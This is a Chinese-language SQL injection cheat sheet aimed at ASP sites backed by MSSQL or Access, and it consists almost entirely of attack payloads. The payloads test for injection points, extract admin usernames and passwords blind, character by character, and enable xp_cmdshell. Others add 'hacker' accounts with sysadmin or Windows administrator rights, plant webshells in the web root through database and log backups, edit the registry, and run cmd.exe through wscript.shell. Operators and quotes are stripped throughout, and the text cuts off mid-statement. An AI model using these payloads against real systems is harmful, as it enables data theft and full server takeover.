SQL入侵全语法手册.doc

SQL手工注入大全-比方说在查询id是50的数据时，如果用户传近来的参数是50 and 1=1，如果没有设置过滤的话，可以直接查出来，SQL 注入一般在ASP程序中遇到最多，看看下面的1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user03.判断数据库系统;and (select count(*) from sysobjects)0 mssql;and (select count(*) from msysobjects)0 access4.注入参数是字符and 查询条件 and =5.搜索时没过滤参数的and 查询条件 and %25=6.猜数据库;and (select Count(*) from 数据库名)07.猜字段;and (select Count(字段名) from 数据库名)08.猜字段中记录长度;and (select top 1 len(字段名) from 数据库名)09.(1)猜字段的ascii值（access）;and (select top 1 asc(mid(字段名,1,1) from 数据库名)0(2)猜字段的ascii值（mssql）;and (select top 1 unicode(substring(字段名,1,1) from 数据库名)010.测试权限结构（mssql）;and 1=(select IS_SRVROLEMEMBER(sysadmin);-;and 1=(select IS_SRVROLEMEMBER(serveradmin);-;and 1=(select IS_SRVROLEMEMBER(setupadmin);-;and 1=(select IS_SRVROLEMEMBER(securityadmin);-;and 1=(select IS_SRVROLEMEMBER(diskadmin);-;and 1=(select IS_SRVROLEMEMBER(bulkadmin);-;and 1=(select IS_MEMBER(db_owner);-11.添加mssql和系统的帐户;exec master.dbo.sp_addlogin username;-;exec master.dbo.sp_password null,username,password;-;exec master.dbo.sp_addsrvrolemember sysadmin username;-;exec master.dbo.xp_cmdshell net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-;exec master.dbo.xp_cmdshell net user username password /add;-;exec master.dbo.xp_cmdshell net localgroup administrators username /add;-12.(1)遍历目录;create table dirs(paths varchar(100), id int);insert dirs exec master.dbo.xp_dirtree c:;and (select top 1 paths from dirs)0;and (select top 1 paths from dirs where paths not in(上步得到的paths)(2)遍历目录;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255);-;insert temp exec master.dbo.xp_availablemedia;- 获得当前所有驱动器;insert into temp(id) exec master.dbo.xp_subdirs c:;- 获得子目录列表;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;- 获得所有子目录的目录树结构;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;- 查看文件的内容13.mssql中的存储过程xp_regenumvalues 注册表根键, 子键;exec xp_regenumvalues HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun 以多个记录集方式返回所有键值xp_regread 根键,子键,键值名;exec xp_regread HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir 返回制定键的值xp_regwrite 根键,子键, 值名, 值类型, 值值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型;exec xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestvalueName,reg_sz,hello 写入注册表xp_regdeletevalue 根键,子键,值名exec xp_regdeletevalue HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestvalueName 删除某个值xp_regdeletekey HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey 删除键,包括该键下所有值14.mssql的backup创建webshelluse modelcreate table cmd(str image);insert into cmd(str) values ();backup database model to disk=c:l.asp;15.mssql内置函数;and (select version)0 获得Windows的版本号;and user_name()=dbo 判断当前系统的连接用户是不是sa;and (select user_name()0 爆当前系统的连接用户;and (select db_name()0 得到当前连接的数据库16.简洁的webshelluse modelcreate table cmd(str image);insert into cmd(str) values ();backup database model to disk=g:wwwtestl.asp;请求的时候，像这样子用：http:/ip/l.asp?c=dirSQL手工注入大全前提需要工具：SQL Query Analyzer和SqlExec Sunx Version1.去掉xp_cmdshell扩展过程的方法是使用如下语句：if exists (select * from dbo.sysobjects where id=object_id(Ndbo.xpcmdshell) and OBJECTPROPERTY(id,NIsExtendedProc)=1)exec sp_dropextendedproc Ndbo.xp_cmdshell2.添加xp_cmdshell扩展过程的方法是使用如下语句：（1）SQL Query Analyzersp_addextendedproc xp_cmdshell,dllname=xplog70.dll（2）首先在SqlExec Sunx Version的Format选项里填上%s，在CMD选项里输入sp_addextendedproc xp_cmdshell,xpsql70.dll去除sp_dropextendedproc xp_cmdshell（3）MSSQL2000sp_addextendedproc xp_cmdshell,xplog70.dllSQL手工注入方法总结(SQL Server2005)2010-01-28 16:17-以下以省略注入点用URL代替-(1) *查看驱动器方法*- 建表p(i为自动编号,a记录盘符类似c:,b记录可用字节,其它省略)URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255);-URL;insert p exec xp_availablemedia;-列出所有驱动器并插入表pURL;and (select count(*) from p)3;-折半法查出驱动器总数URL;and ascii(substring(select a from p where i=1),1,1)=67;-折半法查出驱动器名(注asc(c)=67)-上面一般用于无显错情况下使用-以此类推,得到所有驱动器名URL;and (select a from p where i=1)3;-报错得到第一个驱动器名-上面一般用于显错情况下使用-以此类推,得到所有驱动器名URL;drop table p;-删除表p-(2) *查看目录方法*URL;create table pa(m nvarchar(255),i nvarchar(255);-建表pa(m记录目录,i记录深度)URL;insert pa exec xp_dirtree e:;-列出驱动器e并插入表paURL;and (select count(*) from pa where i0)-1;-折半法查出i深度URL;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa)0;-报错得到深度i=1的第一个目录名-上面一般用显错且目录名不为数字情况下使用-(得到第二个目录把top 0换为top 1,换深度只换i就行)以此类推,得到e盘的所有目录URL;and len(select top 1 m from pa where i=1 and m not in(select top 0 m from pa)0;-折半法查出深度i=1的第一个目录名的长度URL;and ascii(substring(select top 1 m from pa where i=1 and m not in(select top 0 m from pa),1,1)0;-折半法查出深度i=1的第一个目录名的第一个字符长度-上面一般用无显错情况下使用-(得到第二个目录把top 0换为top 1,换深度只换i就行)以此类推,得到e盘的所有目录URL;drop table pa;-删除表pa-经过上面的方法就可得到服务器所有目录(这里为连接用户有读取权限目录)-(3) 数据库备份到Web目录(先拿个WebShell再说吧 注:此为SQL Server2000)URL;alter database employ_ set RECOVERY FULL;-把当前库L设置成日志完全恢复模式URL;URL;create table s(l image);-建表sURL;backup log s to disk = c:cmd with init;-减少备分数据的大小URL;URL;insert s values()-在表s中插入一句话马URL;backup log hh to disk = e:webg.asp;-备分日志到WEB路径URL;drop table s;-删除表sURL;alter database hh set RECOVERY SIMPLE;-把SQL设置成日志简单恢复模式-OK到此WebShell应该到手了-(4) 以下为一些注入杂项-SA权限:URL;exec aster.dbo.sp_addlogin hacker;-添加SQL用户URL;exec master.dbo.sp_password null,hacker,hacker;-设置SQL帐号hacker 的密码为 hackerRL;exec master.dbo.sp_addsrvrolemember sysadmin hacker;-加hacker进sysadmin管理组URL;exec master.dbo.xp_cmdshell net user hacker hacker /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-建立一个系统用hacker 并设置其密码为hackerURL;exec master.dbo.xp_cmdshell net localgroup administrators hacker /add;-hacker加入到管理员组-SQL Server2005暴库、表、段法(前提有显错、无显错用折半法)URL and 0(select count(*) from master.dbo.sysdatabases);-折半法得到数据库个数URL and 01 and dbid=1);-依次提交 dbid = 2.3.4. 得到更多的数据库名URL and 0(select count(*) name from employ.dbo.sysobjects where xtype=U);-折半法得到表个数(假设暴出库名employ)URL and 0(select top 1 name from employ.dbo.sysobjects where xtype=U)- 假设暴出表名为employ_qj则在上面语句上加条件 and name not in (employ_qj 以此一直加条件.URL and 00;-返回正常sql serverURL and (select count(*) from msysobjects)0;-返回正常Access=-检测路径的=URL and (select count(*) from master.dbo.sysdatabases where name0 and dbid=6)0;-=-检测表段的=URL and exists (select * from admin);-=-检测字段的=URL and exists (select username from admin) ;-=-检测ID=URL and exists (select id from admin where ID=1) ;-=-检测长度的=URL and exists (select id from admin where len(username)=5 and ID=1);-=-检测是否为MSSQL数据库=URL and exists (select * from sysobjects) ;-=-检测是否为英文 ;-=URL and exists (select id from admin where asc(mid(username,1,1) between 30 and 130 and ID=1);- ACCESS数据库URL and exists (select id from admin where unicode(substring(username,1,1) between 30 and 130 and ID=1) ;-MSSQL数据库=-检测英文的范围=URL and exists (select id from admin where asc(mid(username,1,1) between 90 and 100 and ID=1);-ACCESS数据库URL and exists (select id from admin where unicode(substring(username,1,1) between 90 and 100 and ID=1);-MSSQL数据库=-检测那个字符=URL and exists (select id from admin where asc(mid(username,1,1)=97 and ID=1);-ACCESS数据库URL and exists (select id from admin where unicode(substring(username,1,1)=97 and ID=1);-MSSQL数据库在对web应用进行渗透测试时，SQL注入无疑是最重要的检测项之一，下面就对常用的SQL注入语句进行一个归纳总结，便于在进行渗透 测试时使用。1.判断有无注入点; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等.and 0(select count(*) from *)and 0(select count(*) from admin) -判断是否存在admin这张表3.猜帐号数目 如果遇到0 返回正确页面 1返回错误页面说明帐号数目就是1个and 0(select count(*) from admin)and 10)-and 1=(select count(*) from admin where len(用户字段名称name)0) and 1=(select count(*) from admin where len(密码字段名称password)0)5.猜解各个字段的长度 猜解长度就是把0变换 直到返回正确页面为止and 1=(select count(*) from admin where len(*)0) and 1=(select count(*) from admin where len(name)6) 错误and 1=(select count(*) from admin where len(name)5) 正确 长度是6and 1=(select count(*) from admin where len(name)=6) 正确and 1=(select count(*) from admin where len(password)11) 正确and 1=(select count(*) from admin where len(password)12) 错误 长度是12and 1=(select count(*) from admin where len(password)=12) 正确6.猜解字符and 1=(select count(*) from admin where left(name,1)=a) -猜解用户帐号的第一位and 1=(select count(*) from admin where left(name,2)=ab)-猜解用户帐号的第二位就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1)=51) - 这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.group by users.id having 1=1- group by users.id, users.username, users.password, users.privs having 1=1-; insert into users values( 666, attacker, foobar, 0xffff )-UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN(login_id)- UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN(login_id,login_name)- UNION SELECT TOP 1 login_name FROM logintable- UNION SELECT TOP 1 password FROM logintable where login_name=Rahul-看服务器打的补丁=出错了打了SP4补丁and 1=(select VERSION)-看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。and 1=(SELECT IS_SRVROLEMEMBER(sysadmin)-判断连接数据库帐号。（采用SA账号连接 返回正常=证明了连接账号是SA）and sa=(SELECT System_user)-and user_name()=dbo-and 0(select user_name()-看xp_cmdshell是否删除and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)-xp_cmdshell被删除，恢复,支持绝对路径的恢复;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:inetpubwwwrootxplog70.dll-反向PING自己实验;use master;declare s int;exec sp_oacreate wscript.shell,s out;exec sp_oamethod s,run,NULL,cmd.exe /c ping ;-加帐号;DECLARE shell INT EXEC SP_OACREATE wscript.shell,shell OUTPUT EXEC SP_OAMETHOD shell,run,null, C:WINNTsystem32cmd.exe/c net user jiaoniang$ 1866574 /add-创建一个虚拟目录E盘： ;declare